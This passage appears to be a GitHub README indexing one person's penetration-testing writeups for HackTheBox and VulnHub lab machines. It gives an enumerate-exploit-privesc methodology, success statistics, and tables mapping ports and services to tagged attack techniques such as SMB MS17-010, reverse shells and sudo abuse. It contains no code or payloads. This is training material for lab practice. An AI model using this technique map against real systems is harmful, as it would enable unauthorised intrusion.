open ports * start with weird services * identify installed software and version * find critical cve/exploits * enumerate more common services - smb/ftp * enumerate services with large attack vector like http at the end <a name="mexploit"></a> ### ⚙️ Phase #2: Exploit [🡑](#methodology) **Goal**: gain interactive access on &lt;targetip&gt; **Process**: * debug available exploits for open ports <a name="mprivesc"></a> ### ⚙️ Phase #3: PrivEsc [🡑](#methodology) **Goal**: gain elevated privileges on &lt;targetip&gt; **Process**: * debug available exploits or misconfigurations * for nix, use [linux smart enum](https://github.com/diego-treitos/linux-smart-enumeration) * for windows, use [winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) <a name="stats"></a> ## ☀️ Stats [↟](#contents) ### 📊 Counts [🡑](#stats) | # | TryHackMe | HackTheBox | VulnHub | OSCPlike | Owned | |:--------:|:---------------:|:-----------------:|:-----------------:|:-----------------:|:-----------------:| | Total | `1/422 (0.24%)` | `25/229 (10.92%)` | `24/706 (3.40%)` | `46/254 (18.11%)` | `50/1357 (3.68%)` | | Windows | `0/0 (0.00%)` | `12/66 (18.18%)` | `0/2 (0.00%)` | `12/39 (30.77%)` | `12/68 (17.65%)` | | *nix | `0/0 (0.00%)` | `13/163 (7.98%)` | `24/704 (3.41%)` | `34/177 (19.21%)` | `37/867 (4.27%)` | | OSCPlike | `0/38 (0.00%)` | `25/94 (26.60%)` | `21/122 (17.21%)` | | `46/254 (18.11%)` | <a name="topcategories"></a> ### 📊 Top Categories [🡑](#stats) <img src="./top_categories.png" height="320" /> <a name="topportsprotocolsservices"></a> ### 📊 Top Ports/Protocols/Services [🡑](#stats) <img src="./top_ports.png" height="320" /> --- <img src="./top_protocols.png" height="320" /> --- <img src="./top_services.png" height="320" /> <a name="topttps"></a> ### 📊 Top TTPs [🡑](#stats) <img src="./top_ttps_enumerate.png" height="320" /> --- <img src="./top_ttps_exploit.png" height="320" /> --- <img src="./top_ttps_privesc.png" height="320" /> <a name="mapping"></a> ## ⚡ Mapping [↟](#contents) | # | Port | Service | TTPs | TTPs - ITW | |---|------|-----------|------|------------| | 1. | `21/tcp` | `ftp/Microsoft ftpd`<br /><br />`ftp/vsftpd 2.3.5` | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp) | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root) | | 2. | `22/tcp` | `ssh/OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)` | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh) | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | `23/tcp` | | [`enumerate_proto_telnet`](https://github.com/7h3rAm/writeups#enumerate_proto_telnet) | | | 4. | `25/tcp` | | [`enumerate_proto_smtp`](https://github.com/7h3rAm/writeups#enumerate_proto_smtp) | | | 5. | `53/tcp` | | [`enumerate_proto_dns`](https://github.com/7h3rAm/writeups#enumerate_proto_dns) | | | 6. | `79/tcp` | | [`enumerate_proto_finger`](https://github.com/7h3rAm/writeups#enumerate_proto_finger) | | | 7. | `80/tcp` | `http/2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd`<br /><br />`http/Apache httpd 2.0.52 ((CentOS))`<br /><br />`http/Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)`<br /><br />`http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.2.22 ((Ubuntu))`<br /><br />`http/Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)`<br /><br />`http/Apache httpd 2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.25 ((Debian))`<br /><br />`http/Apache httpd 2.4.29`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.34 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.41 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.7 ((Ubuntu))`<br /><br />`http/HttpFileServer httpd 2.3`<br /><br />`http/Microsoft IIS httpd 6.0`<br /><br />`http/Microsoft IIS httpd 7.5` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 8. | `111/tcp` | | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs), [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 9. | `135/tcp` | | [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 10. | `139/tcp` | `netbios-ssn/Microsoft Windows netbios-ssn`<br /><br />`netbios-ssn/Samba smbd 3.X - 4.X (workgroup: WORKGROUP)` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root) | | 11. | `161/tcp` | | [`enumerate_proto_snmp`](https://github.com/7h3rAm/writeups#enumerate_proto_snmp) | | | 12. | `389/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 13. | `443/tcp` | `ssl/https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 14. | `445/tcp` | `microsoft-ds/Windows Server 2019 Standard 17763 microsoft-ds` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 15. | `636/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 16. | `1337/tcp` | `http/Apache httpd 2.4.7 ((Ubuntu))` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 17. | `1433/tcp` | `ms-sql-s/Microsoft SQL Server 14.00.1000.00` | [`enumerate_proto_mssql`](https://github.com/7h3rAm/writeups#enumerate_proto_mssql), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig) | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell) | | 18. | `1521/tcp` | | [`enumerate_proto_oracle`](https://github.com/7h3rAm/writeups#enumerate_proto_oracle), [`enumerate_proto_postgres`](https://github.com/7h3rAm/writeups#enumerate_proto_postgres) | | | 19. | `1974/tcp` | | | [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 20. | `2049/tcp` | `nfs_acl/2-3 (RPC #100227)`<br /><br />`nfs_acl/3 (RPC #100227)` | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs) | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid) | | 21. | `3000/tcp` | `http/Node.js Express framework` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 22. | `3232/tcp` | | [`enumerate_proto_distcc`](https://github.com/7h3rAm/writeups#enumerate_proto_distcc) | | | 23. | `3306/tcp` | | [`enumerate_proto_mysql`](https://github.com/7h3rAm/writeups#enumerate_proto_mysql) | | | 24. | `6660/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 25. | `6661/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 26. | `6662/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 27. | `6663/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 28. | `6664/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 29. | `6665/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 30. | `6666/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 31. | `6667/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 32. | `6668/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 33. | `6669/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 34. | `7000/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 35. | `8080/tcp` | `http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_rdp`](https://github.com/7h3rAm/writeups#enumerate_proto_rdp), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 36. | `9999/tcp` | `abyss?` | | [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 37. | `10000/tcp` | `http/SimpleHTTPServer 0.6 (Python 2.7.3)` | | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof) | | 38. | `27017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | | 39. | `28017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | <a name="machines"></a> ## 💥 Machines [↟](#contents) | # | Name | Infra | Killchain | TTPs | |:---:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100"/> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 2. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png" width="59" height="20"/> | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 3. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100"/> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png" width="59" height="20"/> | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 5. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png" width="59" height="20"/> | [htb#51](https://www.hackthebox.eu/home/machines/profile/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100"/> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100"/> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 7. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100"/> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 8. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png" width="59" height="20"/> | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 9. | [Cronos](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png" width="59" height="20"/> | [htb#11](https://www.hackthebox.eu/home/machines/profile/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 10. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 11. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png" width="59" height="20"/> | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100"/> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), 